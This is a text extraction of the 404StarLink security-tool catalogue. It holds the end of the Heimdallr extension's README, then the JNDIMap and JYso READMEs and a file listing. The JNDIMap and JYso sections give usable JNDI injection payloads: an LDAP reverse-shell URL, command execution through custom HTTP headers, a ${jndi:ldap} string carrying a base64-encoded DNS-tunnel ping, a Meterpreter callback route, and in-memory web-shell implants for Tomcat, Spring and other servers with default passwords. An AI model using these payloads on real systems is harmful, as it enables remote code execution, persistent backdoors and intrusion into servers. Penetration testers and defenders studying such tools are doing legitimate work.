> 清除的浏览器持久化项包括:网站应用缓存(appcache)、网站资源缓存、网站缓存存储、Cookie、网络文件系统、表单数据记录、索引数据库(indexDB)、localStorage、密码记录、网络SQL数据(webSQL)
>
> **警告**:清除的数据中包含密码记录,即浏览器的密码管理器的记录。如果你使用浏览器自带的密码管理器和Google账号进行密码记录和维护,清除浏览器的密码管理器记录可能导致Google账号同步的密码被置空。再次建议将攻击主机和日常使用的主机分离,不在攻击主机上登录或保存任何私人有关的账号。
#### 特征对抗配置-WebRTC 防IP泄露严格策略
- 建议设置:安装后手动开启该选项
> 通过提高WebRTC策略严格度防止真实IP泄露,已知Chrome v104(截至2022.9.1)仍存在该漏洞,此选项可在并建议在日常使用时也开启
> 请勿将此策略与其他WebRTC防护插件(如WebRTC Control或WebRTC Leak Prevent)同时使用,各插件调节WebRTC策略会互相干涉,暂停其他插件的使用时的API调用也会影响Heimdallr的调节逻辑。
#### 特征对抗配置-Canves噪点干扰脚本注入
- 建议设置:攻击期间开启,日常使用时关闭
> 通过对当前网页注入内容脚本增加Canvas画布噪点防止特征锁定,开启后所有网页访问时将会额外加载content.js用于画布类的函数hook操作
## 🔔高级
1. 插件的识别对象基于【标签页】,标签页页面变更【(域名+端口)或(IP+端口)】时清空结果,切换标签页时结果会暂存,关闭标签页或窗口时删除对应结果。
2. 插件默认只存在被动流量监控,不会因为敏感指纹的识别触发防火墙处置。
3. 插件识别结果为页面及页面子框架的请求内容,部分页面告警【请求体数据为json格式】、【请求头Content-Type为application/json格式】时,不一定是当前document的请求,有可能是当前document页加载的相关页面的接口请求匹配了规则.
4. 因为谷歌Chrome API的安全限制和Chrome内核的历史遗留问题,插件对响应体Body的检查与其他指纹位置的检查不同,浏览器页面顶部会出现调试提示,可通过插件设置关闭响应包检查功能或添加谷歌浏览器的启动项规避提示(在Chrome快捷方式右键打开属性,在快捷方式栏的【目标】框添加启动参数 `--silent-debugger-extension-api`)。
5. 插件目的为发现直接访问无法识别的组件或框架,请勿添加可以直接识别的组件的特征到指纹库(如spark未授权页面),增加无意义的识别流程导致识别负担增加。
## 🎇继续开发
#### 新增指纹
在实战中遇到有意义的高危指纹特征或未在拦截列表中的蜜罐请求特征都可以打开新的issue提交,作者会尽快在验证可用性后将指纹添加到新的版本中。
#### 二次开发
Vue3前端模块
```
cd Vue_popup\heimdallr_v3
npm install
npm run build:watch
vim src\App.vue
```
chrome插件模块
```
cd .\Heimdallr\
```
指纹模块
```
cd .\Heimdallr\resource\data
vim data.js
```
<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
## 项目相关
## 最近更新
<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
================================================
FILE: detail/JNDIMap.md
================================================
## JNDIMap <https://github.com/X1r0z/JNDIMap>
<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->





<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
<p align="center">
JNDIMap 是一个强大的 JNDI 注入利用框架, 支持 RMI、LDAP 和 LDAPS 协议, 包含多种高版本 JDK 绕过方式
</p>
<p align="center">简体中文 | <a href="README.en.md">English</a></p>
</p>
## 🚀 快速上手
在 [Release](https://github.com/X1r0z/JNDIMap/releases) 页面下载 JNDIMap, 运行时传入 `-i` 参数指定外部 IP
```bash
java -jar JNDIMap-version.jar -i 10.0.0.1
```
在目标机器上执行命令或反弹 Shell
```bash
rmi://10.0.0.1:1099/Basic/Command/open -a Calculator
ldap://10.0.0.1:1389/Basic/ReverseShell/10.0.0.1/1337
```
## 🚩 功能特性
- DNSLog
- 命令执行
- 反弹 Shell
- Meterpreter 上线
- 加载自定义 Java 字节码
- 内存马注入 (基于 [MemShellParty](https://github.com/ReaJason/MemShellParty))
- 高版本 JDK 绕过
- BeanFactory 绕过 (Tomcat/Groovy/XStream, etc.)
- JDBC RCE (MySQL/PostgreSQL/H2/Derby)
- Tomcat Blind XXE
- LDAP 反序列化 (包含常用 Gadget)
- Nashorn JS 自定义 JNDI Payload
- LDAP trustSerialData 绕过
- JShell Payload 绕过 (可替代 Nashorn JS Engine)
- UTF-8 Overlong Encoding 绕过
## ⚙️ 编译
[Releases](https://github.com/X1r0z/JNDIMap/releases) 的版本可能存在滞后, 推荐在使用时拉取源码自行编译 (基于 JDK 8)
```bash
git clone https://github.com/X1r0z/JNDIMap && cd JNDIMap
mvn package -Dmaven.test.skip=true
```
## 📷 参考 & 致谢
[https://tttang.com/archive/1405/](https://tttang.com/archive/1405/)
[https://paper.seebug.org/1832/](https://paper.seebug.org/1832/)
[https://xz.aliyun.com/t/12846](https://xz.aliyun.com/t/12846)
[http://www.lvyyevd.cn/archives/derby-shu-ju-ku-ru-he-shi-xian-rce](http://www.lvyyevd.cn/archives/derby-shu-ju-ku-ru-he-shi-xian-rce)
[https://y4tacker.github.io/2023/03/20/year/2023/3/FastJson 与原生反序列化/](https://y4tacker.github.io/2023/03/20/year/2023/3/FastJson%E4%B8%8E%E5%8E%9F%E7%94%9F%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/)
[https://y4tacker.github.io/2023/04/26/year/2023/4/FastJson 与原生反序列化-二/](https://y4tacker.github.io/2023/04/26/year/2023/4/FastJson%E4%B8%8E%E5%8E%9F%E7%94%9F%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-%E4%BA%8C/)
[https://www.yulegeyu.com/2022/11/12/Java 安全攻防之老版本 Fastjson 的一些不出网利用/](https://www.yulegeyu.com/2022/11/12/Java%E5%AE%89%E5%85%A8%E6%94%BB%E9%98%B2%E4%B9%8B%E8%80%81%E7%89%88%E6%9C%ACFastjson-%E7%9A%84%E4%B8%80%E4%BA%9B%E4%B8%8D%E5%87%BA%E7%BD%91%E5%88%A9%E7%94%A8/)
[https://gv7.me/articles/2020/deserialization-of-serialvesionuid-conflicts-using-a-custom-classloader/](https://gv7.me/articles/2020/deserialization-of-serialvesionuid-conflicts-using-a-custom-classloader/)
[https://www.leavesongs.com/PENETRATION/use-tls-proxy-to-exploit-ldaps.html](https://www.leavesongs.com/PENETRATION/use-tls-proxy-to-exploit-ldaps.html)
[https://exp10it.io/2025/03/h2-rce-in-jre-17/](https://exp10it.io/2025/03/h2-rce-in-jre-17/)
[https://forum.butian.net/share/4414](https://forum.butian.net/share/4414)
[https://yzddmr6.com/posts/swinglazyvalue-in-webshell/](https://yzddmr6.com/posts/swinglazyvalue-in-webshell/)
[https://mogwailabs.de/en/blog/2024/12/jndi-mind-tricks/](https://mogwailabs.de/en/blog/2024/12/jndi-mind-tricks/)
[https://www.leavesongs.com/PENETRATION/utf-8-overlong-encoding.html](https://www.leavesongs.com/PENETRATION/utf-8-overlong-encoding.html)
[https://github.com/Whoopsunix/utf-8-overlong-encoding](https://github.com/Whoopsunix/utf-8-overlong-encoding)
<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
## 项目相关
## 最近更新
#### [v0.0.4] - 2025-11-20
**特性**
- 支持 UTF-8 Overlong Encoding 绕过
- 支持 JDK 17 Jackson 反序列化
- 支持在新线程中反弹 Shell
**维护**
- 增加 GitHub Workflow 自动构建
<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
================================================
FILE: detail/JYso.md
================================================
## JYso <https://github.com/qi4L/JYso>
<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->





<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
# 😈使用说明
```所有使用示例,用的是Yakit的FUZZ语法```
使用 ```java -jar JNDIExploit-[version].jar -h``` 查看参数说明,其中 ```--ip``` 参数为必选参数
```
Usage: java -jar JNDIExploit-[version].jar [options]
Options:
* -i, --ip Local ip address (default: 0.0.0.0)
-rP, --rmiPort rmi bind port (default: 1099)
-lP, --ldapPort Ldap bind port (default: 1389)
-hP, --httpPort Http bind port (default: 3456)
-g, --gadgets Show gadgets (default: false)
-c, --command RMI this command
-h, --help Show this help
```
* 目前支持的所有 ```PayloadType``` 为
* ```Bypass```: 用于rmi本地工厂类加载,通过添加自定义```header``` ```nu1r: whoami``` 的方式传递想要执行的命令
* ```TomcatEcho```: 用于在中间件为 ```Tomcat``` 时命令执行结果的回显,通过添加自定义```header``` ```cmd: whoami```
的方式传递想要执行的命令
* ```SpringEcho```: 用于在框架为 ```SpringMVC/SpringBoot```
时命令执行结果的回显,通过添加自定义```header``` ```nu1r: whoami``` 的方式传递想要执行的命令
* ```JbossEcho```: Jboss 命令执行回显, 通过添加自定义```header``` ```nu1r: whoami``` 的方式传递想要执行的命令
* ```AllEcho```: 自动选择命令执行回显, 通过添加自定义```header``` ```nu1r: whoami``` 的方式传递想要执行的命令
* ```nu1r```:用于执行命令,如果命令有特殊字符,支持对命令进行 Base64编码后传输
```
{{url
(${jndi:ldap://0.0.0.0:1389/TomcatBypass/nu1r/Base64/{{base64
(ping xxx.dnstunnel.run)
}}})
}}
```
- 支持tomcatBypass路由直接上线msf:
```
使用msf的java/meterpreter/reverse_tcp开启监听
ldap://127.0.0.1:1389/TomcatBypass/Meterpreter/msf/[msfip]/[msfport]
```
---
# 🦄内存马
两种添加方式:
- 支持引用远程类加载方式打入(Basic路由)。
- 支持本地工厂类加载方式打入(TomcatBypass路由)。
使用说明:
不指定类型就默认为冰蝎马。
- t 选择内存马的类型
- 不指定类型就默认为冰蝎马
- bx: 冰蝎内存马,```key: nu1ryyds```, ```Referer:https://nu1r.cn/```
- gz: 哥斯拉内存马,```pass: nu1r```, ```Referer:https://nu1r.cn/```
- gzraw: 哥斯拉 raw 类型的内存马, ```pass: nu1r```, ```Referer:https://nu1r.cn/```
- cmd: cmd命令回显内存马。
- a:是否继承恶意类 AbstractTranslet
- o:使用反射绕过
- w:Windows下使用Agent写入
- l:Linux下使用Agent写入
- u:内存马绑定的路径,default [/version.txt]
- pw:内存马的密码,default [p@ssw0rd]
- r:内存马 Referer check,default [https://nu1r.cn/]
- h:通过将文件写入$JAVA_HOME来隐藏内存shell,目前只支持 SpringControllerMS
- ht:隐藏内存外壳,输入1:write /jre/lib/charsets.jar 2:write /jre/classes/
示例
```shell
{{url
(${jndi:ldap://111.229.10.212:1389/Basic/tomcatfilterjmx/shell/-u path223 -pw 123456 -r tth.cn})
}}
```
内存马说明:
* ```SpringInterceptor```: 向系统内植入 Spring Interceptor 类型的内存马
* ```SpringController```: 向系统内植入 Spring Controller 类型的内存马
* ```JettyFilter```: 利用 JMX MBeans 向系统内植入 Jetty Filter 型内存马
* ```JettyServlet```: 利用 JMX MBeans 向系统内植入 Jetty Servlet 型内存马
* ```JBossFilter```: 通过全局上下文向系统内植入 JBoss/Wildfly Filter 型内存马
* ```JBossServlet```: 通过全局上下文向系统内植入 JBoss/Wildfly Servlet 型内存马
* ```resinFilterTh```: 通过线程类加载器获取指定上下文系统内植入 Resin Filter 型内存马
* ```resinServletTh```: 通过线程类加载器获取指定上下文系统内植入 Resin Servlet 型内存马
* ```WebsphereMemshell```: 用于植入```Websphere内存shell```, 支持```Behinder shell``` 与 ```Basic cmd shell```
* ```tomcatFilterJmx```: 利用 JMX MBeans 向系统内植入 Tomcat Filter 型内存马
* ```tomcatFilterTh```: 通过线程类加载器获取指定上下文向系统内植入 Tomcat Filter 型内存马
* ```TomcatListenerJmx```: 利用 JMX MBeans 向系统内植入 Tomcat Listener 型内存马
* ```TomcatListenerTh```: 通过线程类加载器获取指定上下文向系统内植入 Tomcat Listener 型内存马
* ```TomcatServletJmx```: 利用 JMX MBeans 向系统内植入 Tomcat Servlet 型内存马
* ```TomcatServletTh```: 通过线程类加载器获取指定上下文向系统内植入 Tomcat Servlet 型内存马
* ```WSFilter```: `CMD` 命令回显 WebSocket 内存马,`cmd命令回显`
* ```TomcatExecutor``` : Executor 内存马,`cmd命令回显`
* ```TomcatUpgrade```: TomcatUpgrade 内存马,`cmd命令回显`
* ```Struts2ActionMS```: Action 类型内存马
---
# 👻 BeanShell1 与 Clojure 利用链的拓展
对于 `BeanShell1` 及 `Clojure` 这两个基于脚本语言解析的漏利用方式。
本项目为这两条利用链拓展
gitextract_wm6jbvoe/ ├── .github/ │ └── ISSUE_TEMPLATE/ │ └── application.yml ├── README.md ├── allprojects.md ├── banner.md ├── column/ │ ├── 2021KCon_exhibition_with_starlink.md │ ├── 2022KCon_exhibition_with_starlink.md │ ├── 2023KCon_exhibition_with_starlink.md │ ├── 2024KCon_exhibition_with_starlink.md │ └── starlink_project_video.md ├── detail/ │ ├── AiPy.md │ ├── Antenna.md │ ├── AntiDebug_Breaker.md │ ├── AppInfoScanner.md │ ├── AppScan.md │ ├── As-Exploits.md │ ├── BinAbsInspector.md │ ├── BurpCrypto.md │ ├── CDK.md │ ├── Cloud-Bucket-Leak-Detection-Tools.md │ ├── CodeReviewTools.md │ ├── Cola-Dnslog.md │ ├── CyberStrikeAI.md │ ├── DNSlog-GO.md │ ├── ENScanGo.md │ ├── Elkeid.md │ ├── Glass.md │ ├── GrabAccess.md │ ├── HaE.md │ ├── HackBrowserData.md │ ├── Hades.md │ ├── Heimdallr.md │ ├── JNDIMap.md │ ├── JYso.md │ ├── Juggler.md │ ├── KunLun-M.md │ ├── Kunpeng.md │ ├── Kunyu.md │ ├── LBot.md │ ├── LSpider.md │ ├── MDUT.md │ ├── MySQL-Fake-Server.md │ ├── MySQLMonitor.md │ ├── MysqlT.md │ ├── OpenStar.md │ ├── Pillager.md │ ├── Platypus.md │ ├── Pocassist.md │ ├── PortForward.md │ ├── Redis-Rogue-Server.md │ ├── ServerScan.md │ ├── Stowaway.md │ ├── Tai-e.md │ ├── Typhon.md │ ├── WMIHACKER.md │ ├── WeaponizedVSCode.md │ ├── ZoomEye-Python.md │ ├── ZoomEye-Tools.md │ ├── ZoomEye-go.md │ ├── afrog.md │ ├── agentic-soc-platform.md │ ├── antSword.md │ ├── appshark.md │ ├── camille.md │ ├── ct.md │ ├── dperf.md │ ├── f8x.md │ ├── frida-skeleton.md │ ├── fscan.md │ ├── g3proxy.md │ ├── gshark.md │ ├── java-object-searcher.md │ ├── js-cookie-monitor-debugger-hook.md │ ├── ksubdomain.md │ ├── linglong.md │ ├── murphysec.md │ ├── myscan.md │ ├── passive-scan-client.md │ ├── pocsuite3.md │ ├── qscan.md │ ├── rakshasa.md │ ├── scaninfo.md │ ├── shellcodeloader.md │ ├── vArmor.md │ ├── veinmind-tools.md │ ├── vultrap.md │ ├── wam.md │ ├── xtate.md │ └── ysomap.md ├── information_analysis.md ├── intranet_tools.md ├── others.md ├── party_a.md ├── penetration_test.md ├── reconnaissance.md └── vulnerability_assessment.md
Condensed preview — 95 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (621K chars).
[
{
"path": ".github/ISSUE_TEMPLATE/application.yml",
"chars": 1092,
"preview": "name: 项目申请\ndescription: 使用此表单填写项目申请\ntitle: \"[项目申请]: \"\nbody:\n - type: checkboxes\n id: requirements\n attributes:\n "
},
{
"path": "README.md",
"chars": 11521,
"preview": "## 404星链计划 / 404 StarLink Project\n\n<div align=\"center\">\n<img src=\"Images/logo.png\" width=\"300\">\n</div>\n\n「404星链计划」是知道创宇 4"
},
{
"path": "allprojects.md",
"chars": 41603,
"preview": "## 全部项目 / All_Projects\n\n* [甲方工具/party_a](#甲方工具party_a)\n * [dperf](#dperf)\n * [Elkeid](#elkeid)\n * [linglong](#l"
},
{
"path": "banner.md",
"chars": 819,
"preview": "## Banner\n\n开源作者收到星链计划邀请函后,希望开源作者可以添加星链计划 Banner 到项目 README 的末尾,这样可以极大增加星链计划的影响力。\n\n**中文版本** \n\n```\n## 404星链计划\n<img src=\"h"
},
{
"path": "column/2021KCon_exhibition_with_starlink.md",
"chars": 4603,
"preview": "## 入选2021Kcon黑客大会兵器谱\n\nKCon 黑客大会由知道创宇主办,秉持着追求干货、乐于分享的精神,力求为每一位热爱黑客技术研究的伙伴打造一个尽情展示、互动交流的创意舞台。如今,历经十年打磨,KCon 黑客大会已成长为国际网络安全"
},
{
"path": "column/2022KCon_exhibition_with_starlink.md",
"chars": 5362,
"preview": "## 入选2022KCon黑客大会兵器谱\r\n\r\n2022年是 KCon 黑客大会举办的第11个年头,亦是10年圆满后踏上新征程的第1步,主题为“**+1 进阶,护航未来**”。\r\n\r\n“+1”或许并不起眼,但“不积跬步,无以至千里;不积小流"
},
{
"path": "column/2023KCon_exhibition_with_starlink.md",
"chars": 2377,
"preview": "## 入选2023KCon黑客大会兵器谱\r\n\r\nKCon大会,国际网络安全圈富有活力与影响力的前沿网络安全攻防技术交流平台,以“追求干货有趣”为宗旨,力求为网安技术研究者们打造一个尽情展示、尽情交流的创意舞台,期待以技术之力引领业界未来的变"
},
{
"path": "column/2024KCon_exhibition_with_starlink.md",
"chars": 1914,
"preview": "## 入选2024KCon黑客大会兵器谱\r\n\r\nKCon 黑客大会,知道创宇出品,始终秉承“追求干货、有趣”的理念,打造开放的网络安全攻防技术交流平台,“汇聚全球黑客的智慧”是 KCon 黑客大会的一贯宗旨。\r\n\r\n本次大会,我们将如鹰击长"
},
{
"path": "column/starlink_project_video.md",
"chars": 1187,
"preview": "## 星际奇兵\n\n「星际奇兵」是知道创宇404实验室“星链计划”下的开源安全工具视频演示栏目,本栏目对项目进行细致的演示指导,陆续更新中。跟我们一起快速上手这些优秀的安全工具吧!\n\n以下账号同步更新,欢迎关注:\n\nB站:知道创宇404实验室"
},
{
"path": "detail/AiPy.md",
"chars": 3881,
"preview": "## AiPy <https://github.com/knownsec/aipyapp>\n<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->\n![Language"
},
{
"path": "detail/Antenna.md",
"chars": 4263,
"preview": "## Antenna <https://github.com/wuba/Antenna>\n<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->\n![Language]"
},
{
"path": "detail/AntiDebug_Breaker.md",
"chars": 887,
"preview": "## AntiDebug_Breaker <https://github.com/0xsdeo/AntiDebug_Breaker>\n<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7d"
},
{
"path": "detail/AppInfoScanner.md",
"chars": 8130,
"preview": "## AppInfoScanner <https://github.com/kelvinBen/AppInfoScanner>\n<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a"
},
{
"path": "detail/AppScan.md",
"chars": 3146,
"preview": "## AppScan <https://github.com/TongchengOpenSource/AppScan>\n<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e"
},
{
"path": "detail/As-Exploits.md",
"chars": 1876,
"preview": "## As-Exploits <https://github.com/yzddmr6/As-Exploits>\n<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->\n"
},
{
"path": "detail/BinAbsInspector.md",
"chars": 7934,
"preview": "## BinAbsInspector <https://github.com/KeenSecurityLab/BinAbsInspector>\n<!--auto_detail_badge_begin_0b490ffb61b26b45de3e"
},
{
"path": "detail/BurpCrypto.md",
"chars": 3237,
"preview": "## BurpCrypto <https://github.com/whwlsfb/BurpCrypto>\n<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->\n\n2. [KunLun-M](#kunlun-m)\n3. [Pillager](#pillager)"
},
{
"path": "intranet_tools.md",
"chars": 5376,
"preview": "## 内网工具 / intranet_tools\n\n1. [fscan](#fscan)\n2. [antSword](#antsword)\n3. [Stowaway](#stowaway)\n4. [shellcodeloader](#she"
},
{
"path": "others.md",
"chars": 6845,
"preview": "## 其他 / others\n\n1. [AiPy](#aipy)\n2. [CyberStrikeAI](#cyberstrikeai)\n3. [f8x](#f8x)\n4. [BinAbsInspector](#binabsinspector"
},
{
"path": "party_a.md",
"chars": 6993,
"preview": "## 甲方工具 / party_a\n\n1. [dperf](#dperf)\n2. [Elkeid](#elkeid)\n3. [linglong](#linglong)\n4. [Tai-e](#tai-e)\n5. [murphysec](#m"
},
{
"path": "penetration_test.md",
"chars": 7877,
"preview": "## 攻击与利用 / penetration_test\n\n1. [dperf](#dperf)\n2. [CDK](#cdk)\n3. [pocsuite3](#pocsuite3)\n4. [MDUT](#mdut)\n5. [JYso](#jy"
},
{
"path": "reconnaissance.md",
"chars": 7296,
"preview": "## 信息收集 / reconnaissance\n\n1. [ENScanGo](#enscango)\n2. [HaE](#hae)\n3. [AppInfoScanner](#appinfoscanner)\n4. [ksubdomain](#"
},
{
"path": "vulnerability_assessment.md",
"chars": 2452,
"preview": "## 漏洞探测 / vulnerability_assessment\n\n1. [afrog](#afrog)\n2. [Kunpeng](#kunpeng)\n3. [Pocassist](#pocassist)\n4. [myscan](#my"
}
]
About this extraction
This page contains the full source code of the knownsec/404StarLink GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 95 files (581.8 KB), approximately 226.2k tokens. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.